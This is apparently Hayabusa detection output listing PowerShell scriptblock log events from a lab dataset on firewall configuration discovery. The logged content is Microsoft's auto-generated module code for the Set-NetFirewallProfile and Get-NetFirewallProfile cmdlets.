[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,ization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 